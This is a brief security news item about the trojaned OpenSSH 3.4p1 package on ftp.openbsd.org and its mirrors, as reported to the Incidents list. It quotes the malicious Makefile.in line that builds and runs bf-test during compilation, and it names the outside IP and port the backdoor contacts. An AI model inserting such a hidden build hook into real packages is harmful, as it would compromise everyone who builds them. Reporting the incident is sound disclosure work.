Edwin Groothuis sent an email to the Incidents mailing list in which he says that the OpenSSH package on ftp.openbsd.org and its mirrors is trojaned.
The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
bf-test.c is nothing more than a wrapper which generates a
shell-script which compiles itself and tries to connect to an
server running on 184.108.40.206:6667 (web.snsonline.net).
[ Read more ]
Analysis of the trojaned openssh was sent to BugTraq by Christian Bahls and can be read from Neohapsis
Reading our newsletter every Monday will keep you up-to-date with security news.
Receive a daily digest of the latest security news.